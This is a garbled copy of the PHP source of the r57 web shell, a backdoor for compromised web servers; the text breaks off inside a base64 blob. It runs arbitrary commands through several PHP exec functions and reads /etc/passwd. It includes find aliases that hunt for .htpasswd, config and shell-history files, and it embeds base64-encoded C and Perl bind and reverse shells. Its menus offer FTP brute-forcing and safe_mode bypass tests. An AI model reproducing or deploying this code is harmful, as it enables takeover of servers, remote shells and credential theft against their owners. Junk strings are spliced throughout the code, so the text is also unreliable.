??????UltraFrmUltraFrm 'ru_text104'=>'???????? ????? ?? ???????? ????UltraFrmUltraFrm 'ru_text105'=>'????UltraFrmUltraFrm 'ru_text106'=>'??UltraFrmUltraFrm 'ru_text107'=>'????UltraFrmUltraFrm 'ru_butt15'=>'?????????UltraFrmUltraFrm 'ru_text108'=>'????? ??????UltraFrmUltraFrm 'ru_text109'=>'????????UltraFrmUltraFrm 'ru_text110'=>'??????????UltraFrmUltraFrm /* --------------------------------------------------------------- */ 'eng_text1' =>'Executed commandUltraFrmUltraFrm 'eng_text2' =>'Execute command on serverUltraFrmUltraFrm 'eng_text3' =>'Run commandUltraFrmUltraFrm 'eng_text4' =>'Work directoryUltraFrmUltraFrm 'eng_text5' =>'Upload files on serverUltraFrmUltraFrm 'eng_text6' =>'Local fileUltraFrmUltraFrm 'eng_text7' =>'AliasesUltraFrmUltraFrm 'eng_text8' =>'Select aliasUltraFrmUltraFrm 'eng_butt1' =>'ExecuteUltraFrmUltraFrm 'eng_butt2' =>'UploadUltraFrmUltraFrm 'eng_text9' =>'Bind port to /bin/bashUltraFrmUltraFrm 'eng_text10'=>'PortUltraFrmUltraFrm 'eng_text11'=>'Password for accessUltraFrmUltraFrm 'eng_butt3' =>'BindUltraFrmUltraFrm 'eng_text12'=>'back-connectUltraFrmUltraFrm 'eng_text13'=>'IPUltraFrmUltraFrm 'eng_text14'=>'PortUltraFrmUltraFrm 'eng_butt4' =>'ConnectUltraFrmUltraFrm 'eng_text15'=>'Upload files from remote serverUltraFrmUltraFrm 'eng_text16'=>'WithUltraFrmUltraFrm 'eng_text17'=>'Remote fileUltraFrmUltraFrm 'eng_text18'=>'Local fileUltraFrmUltraFrm 'eng_text19'=>'ExploitsUltraFrmUltraFrm 'eng_text20'=>'UseUltraFrmUltraFrm 'eng_text21'=>' New nameUltraFrmUltraFrm 'eng_text22'=>'datapipeUltraFrmUltraFrm 'eng_text23'=>'Local portUltraFrmUltraFrm 'eng_text24'=>'Remote hostUltraFrmUltraFrm 'eng_text25'=>'Remote portUltraFrmUltraFrm 'eng_text26'=>'UseUltraFrmUltraFrm 'eng_butt5' =>'RunUltraFrmUltraFrm 'eng_text28'=>'Work in safe_modeUltraFrmUltraFrm 'eng_text29'=>'ACCESS DENIEDUltraFrmUltraFrm 'eng_butt6' =>'ChangeUltraFrmUltraFrm 'eng_text30'=>'Cat fileUltraFrmUltraFrm 'eng_butt7' =>'ShowUltraFrmUltraFrm 'eng_text31'=>'File not foundUltraFrmUltraFrm 'eng_text32'=>'Eval PHP codeUltraFrmUltraFrm 'eng_text33'=>'Test bypass open_basedir with cURL functionsUltraFrmUltraFrm 'eng_butt8' =>'TestUltraFrmUltraFrm 'eng_text34'=>'Test bypass safe_mode with include functionUltraFrmUltraFrm 'eng_text35'=>'Test bypass safe_mode with load file in mysqlUltraFrmUltraFrm 'eng_text36'=>'DatabaseUltraFrmUltraFrm 'eng_text37'=>'LoginUltraFrmUltraFrm 'eng_text38'=>'PasswordUltraFrmUltraFrm 'eng_text39'=>'TableUltraFrmUltraFrm 'eng_text40'=>'Dump database tableUltraFrmUltraFrm 'eng_butt9' =>'DumpUltraFrmUltraFrm 'eng_text41'=>'Save dump in fileUltraFrmUltraFrm 'eng_text42'=>'Edit filesUltraFrmUltraFrm 'eng_text43'=>'File for editUltraFrmUltraFrm 'eng_butt10'=>'SaveUltraFrmUltraFrm 'eng_text44'=>'Can\'t edit file! Only read access!UltraFrmUltraFrm 'eng_text45'=>'File savedUltraFrmUltraFrm 'eng_text46'=>'Show phpinfo()UltraFrmUltraFrm 'eng_text47'=>'Show variables from php.iniUltraFrmUltraFrm 'eng_text48'=>'Delete temp filesUltraFrmUltraFrm 'eng_butt11'=>'Edit fileUltraFrmUltraFrm 'eng_text49'=>'Delete script from serverUltraFrmUltraFrm 'eng_text50'=>'View cpu infoUltraFrmUltraFrm 'eng_text51'=>'View memory infoUltraFrmUltraFrm 'eng_text52'=>'Find textUltraFrmUltraFrm 'eng_text53'=>'In dirsUltraFrmUltraFrm 'eng_text54'=>'Find text in filesUltraFrmUltraFrm 'eng_butt12'=>'FindUltraFrmUltraFrm 'eng_text55'=>'Only in filesUltraFrmUltraFrm 'eng_text56'=>'Nothing UltraFrmUltraFrm 'eng_text57'=>'Create/Delete File/DirUltraFrmUltraFrm 'eng_text58'=>'nameUltraFrmUltraFrm 'eng_text59'=>'fileUltraFrmUltraFrm 'eng_text60'=>'dirUltraFrmUltraFrm 'eng_butt13'=>'Create/DeleteUltraFrmUltraFrm 'eng_text61'=>'File createdUltraFrmUltraFrm 'eng_text62'=>'Dir createdUltraFrmUltraFrm 'eng_text63'=>'File deletedUltraFrmUltraFrm 'eng_text64'=>'Dir deletedUltraFrmUltraFrm 'eng_text65'=>'CreateUltraFrmUltraFrm 'eng_text66'=>'DeleteUltraFrmUltraFrm 'eng_text67'=>'Chown/Chgrp/ChmodUltraFrmUltraFrm 'eng_text68'=>'CommandUltraFrmUltraFrm 'eng_text69'=>'param1UltraFrmUltraFrm 'eng_text70'=>'param2UltraFrmUltraFrm 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...UltraFrmUltraFrm 'eng_text72'=>'Text for findUltraFrmUltraFrm 'eng_text73'=>'Find in folderUltraFrmUltraFrm 'eng_text74'=>'Find in filesUltraFrmUltraFrm 'eng_text75'=>'* you can use regexpUltraFrmUltraFrm 'eng_text76'=>'Search text in files via findUltraFrmUltraFrm 'eng_text77'=>'Show database structureUltraFrmUltraFrm 'eng_text78'=>'show tablesUltraFrmUltraFrm 'eng_text79'=>'show columnsUltraFrmUltraFrm 'eng_text80'=>'TypeUltraFrmUltraFrm 'eng_text81'=>'NetUltraFrmUltraFrm 'eng_text82'=>'DatabasesUltraFrmUltraFrm 'eng_text83'=>'Run SQL queryUltraFrmUltraFrm 'eng_text84'=>'SQL queryUltraFrmUltraFrm 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL serverUltraFrmUltraFrm 'eng_text86'=>'Download files from serverUltraFrmUltraFrm 'eng_butt14'=>'DownloadUltraFrmUltraFrm 'eng_text87'=>'Download files from remote ftp-serverUltraFrmUltraFrm 'eng_text88'=>'FTP-serverortUltraFrmUltraFrm 'eng_text89'=>'File on ftpUltraFrmUltraFrm 'eng_text90'=>'Transfer modeUltraFrmUltraFrm 'eng_text91'=>'ArchivationUltraFrmUltraFrm 'eng_text92'=>'without archivationUltraFrmUltraFrm 'eng_text93'=>'FTPUltraFrmUltraFrm 'eng_text94'=>'FTP-bruteforceUltraFrmUltraFrm 'eng_text95'=>'Users listUltraFrmUltraFrm 'eng_text96'=>'Can\'t get users listUltraFrmUltraFrm 'eng_text97'=>'checked: UltraFrmUltraFrm 'eng_text98'=>'success: UltraFrmUltraFrm 'eng_text99'=>'* use username from /etc/passwd for ftp login and passwordUltraFrmUltraFrm 'eng_text100'=>'Send file to remote ftp serverUltraFrmUltraFrm 'eng_text101'=>'Use reverse (user -> resu) login for passwordUltraFrmUltraFrm 'eng_text102'=>'MailUltraFrmUltraFrm 'eng_text103'=>'Send emailUltraFrmUltraFrm 'eng_text104'=>'Send file to emailUltraFrmUltraFrm 'eng_text105'=>'ToUltraFrmUltraFrm 'eng_text106'=>'FromUltraFrmUltraFrm 'eng_text107'=>'SubjUltraFrmUltraFrm 'eng_butt15'=>'SendUltraFrmUltraFrm 'eng_text108'=>'MailUltraFrmUltraFrm 'eng_text109'=>'HideUltraFrmUltraFrm 'eng_text110'=>'ShowUltraFrmUltraFrm ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( 'find suid files'=>'find / -type f -perm -04000 -lsUltraFrmUltraFrm 'find suid files in current dir'=>'find . -type f -perm -04000 -lsUltraFrmUltraFrm 'find sgid files'=>'find / -type f -perm -02000 -lsUltraFrmUltraFrm 'find sgid files in current dir'=>'find . -type f -perm -02000 -lsUltraFrmUltraFrm 'find config.inc.php files'=>'find / -type f -name config.inc.phpUltraFrmUltraFrm 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.phpUltraFrmUltraFrm 'find config* files'=>'find / -type f -name "config*"UltraFrmUltraFrm 'find config* files in current dir'=>'find . -type f -name "config*"UltraFrmUltraFrm 'find all writable files'=>'find / -type f -perm -2 -lsUltraFrmUltraFrm 'find all writable files in current dir'=>'find . -type f -perm -2 -lsUltraFrmUltraFrm 'find all writable directories'=>'find / -type d -perm -2 -lsUltraFrmUltraFrm 'find all writable directories in current dir'=>'find . -type d -perm -2 -lsUltraFrmUltraFrm 'find all writable directories and files'=>'find / -perm -2 -lsUltraFrmUltraFrm 'find all writable directories and files in current dir'=>'find . -perm -2 -lsUltraFrmUltraFrm 'find all service.pwd files'=>'find / -type f -name service.pwdUltraFrmUltraFrm 'find service.pwd files in current dir'=>'find . -type f -name service.pwdUltraFrmUltraFrm 'find all .htpasswd files'=>'find / -type f -name .htpasswdUltraFrmUltraFrm 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswdUltraFrmUltraFrm 'find all .bash_history files'=>'find / -type f -name .bash_historyUltraFrmUltraFrm 'find .bash_history files in current dir'=>'find . -type f -name .bash_historyUltraFrmUltraFrm 'find all .mysql_history files'=>'find / -type f -name .mysql_historyUltraFrmUltraFrm 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_historyUltraFrmUltraFrm 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrcUltraFrmUltraFrm 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrcUltraFrmUltraFrm 'list file attributes on a Linux second extended file system'=>'lsattr -vaUltraFrmUltraFrm 'show opened ports'=>'netstat -an | grep -i listenUltraFrmUltraFrm '----------------------------------------------------------------------------------------------------'=>'ls -la' ); $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; $table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; $table_end1 = "</td></tr>"; $arrow = " <font face=Wingdings color=gray>?</font>"; $lb = "<font color=black>[</font>"; $rb = "<font color=black>]</font>"; $font = "<font face=Verdana size=-2>"; $ts = "<table class=table1 width=100% align=center>"; $te = "</table>"; $fs = "<form name=form method=POST>"; $fe = "</form>"; if(isset($_GET['users'])) { if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } else { echo '<center>'; foreach($users as $user) { echo $user."<br>"; } echo '</center>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } $dir = @getcwd(); $windows = 0; $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^winUltraFrmUltraFrm$os)) { $windows = 1; } else { $unix = 1; } } } if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) { $r .= "<TABLE width=100%>"; foreach($res as $file=>$v) { $r .= "<TR>"; $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); $r .= ($windows)? str_replace("/UltraFrmUltraFrm"\\UltraFrmUltraFrm$file) : $file; $r .= "</b></font></ TD>"; $r .= "</TR>"; foreach($v as $a=>$b) { $r .= "<TR>"; $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; $r .= "</TR>\n"; } } $r .= "</TABLE>"; echo $r; } else { echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat(" UltraFrmUltraFrm$i); } function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\nUltraFrmUltraFrm$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_*******s(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_*******s(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function get_users() { $users = array(); $rows=file('/etc/passwd'); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(":UltraFrmUltraFrm$string); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; } function we($i) { if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } else { $text = "[-] ERROR! Can't write in file "; } echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; return null; } function re($i) { if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; } else { $text = "[-] ERROR! Can't read file "; } echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; return null; } function ce($i) { if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } else { $text = "Can't create "; } echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; return null; } function fe($l,$n) { $text['ru'] = array('?? ??????? ???????????? ? ftp ???????UltraFrmUltraFrm'?????? ??????????? ?? ftp ???????UltraFrmUltraFrm'?? ??????? ???????? ?????????? ?? ftp ???????'); $text['eng'] = array('Connect to ftp server failedUltraFrmUltraFrm'Login to ftp server failedUltraFrmUltraFrm'Can\'t change dir on ftp server'); echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; return null; } function mr($l,$n) { $text['ru'] = array('?? ??????? ????????? ??????UltraFrmUltraFrm'?????? ??????????'); $text['eng'] = array('Can\'t send mailUltraFrmUltraFrm'Mail sent'); echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; return null; } function perms($mode) { if ($GLOBALS['windows']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1sUltraFrmUltraFrm $type); $s.=sprintf("%1s%1s%1sUltraFrmUltraFrm $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1sUltraFrmUltraFrm $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1sUltraFrmUltraFrm $world['read'], $world['write'], $world['execute']); return trim($s); } function in($type,$name,$size,$value) { $ret = "<input type=".$type." name=".$name." "; if($size != 0) { $ret .= "size=".$size." "; } $ret .= "value=\"".$value."\">"; return $ret; } function which($pr) { $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } } function cf($fname,$text) { $w_file=@fopen($fname,"w") or we($fname); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } } function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } } function DirFiles($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (FALSE !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(!is_dir($dir."/".$file)) { if($types) { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if(@in_array($ext,@explode(';UltraFrmUltraFrm$type s))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } function DirFilesWide($dir) { $files = Array(); $dirs = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) { $file = @strtoupper($file); $dirs[$file] = '<DIR>'; } else $files[$file] = @filesize($dir."/".$file); } } @closedir($handle); @ksort($dirs); @ksort($files); $files = @array_merge($dirs,$files); } return $files; } function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';UltraFrmUltraFrm$types ))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } function DirPrintHTMLHeaders($dir) { $pockets = ''; $handle = @opendir($dir) or die("Can't open directory $dir"); echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) { echo " <li><b>[ $file ]</b></li>\n"; DirPrintHTMLHeaders($dir."/".$file); } else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if(@in_array($ext,array('.htmUltraFrmUltraFrm'.htm l'))) { $header = '-=None=-'; $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); for($a=0;$a<count($strings);$a++) { $pattern = '(<title>(.+)</title>)'; if(@eregi($pattern,$strings[$a],$pockets)) { $header = "«".$pockets[2]."»"; break; } } echo " <li>".$header."</li>\n"; } } } } echo " </ul>\n"; @closedir($handle); } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(";UltraFrmUltraFrm$dir); $this->FilesToSearch = Array(); for($a=0;$a<count($dirs);$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode(' UltraFrmUltraFrm$this->text); $delim = '|'; if($phrase) foreach($qq as $k=>$v) $qq[$k] = '\b'.$v.'\b'; $words = '('.@implode($delim,$qq).')'; $pattern = "/".$words."/"; if(!$case) $pattern .= 'i'; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a]; $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>UltraFrmUltraFrm$CurString); $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(" UltraFrmUltraFrm@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jb HVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg +DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4u aD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYy xhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQ sIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja 2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW 5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQg PSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyI D0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2t ldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3 Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTs NCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja 2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCi AgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFz c3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogI CBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0 oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQog ICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCi AgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmF zZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO 2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbi cpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ld ID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc 2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9 Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aX QoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJ vdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0K FMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IG NyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NP Q0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFT l9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiB wb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4i Ow0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoIS gkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICR waWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET 1VULCI+JkNPTk4i Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTC B8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVM TFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V 0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1b mFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZX Q9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1p bmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyP XNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJ yb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2Nr ZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3 RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGR yKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOL CAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1 RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsN CmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==" ; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jb HVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQ vaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50 IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhci BybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWl seSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoY XRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkci hhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJn dlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVUL CBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKCh jb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1 Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY2 9ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzB dKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KI GR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2 ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY 2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2F pdC5oPg0KI2luY2 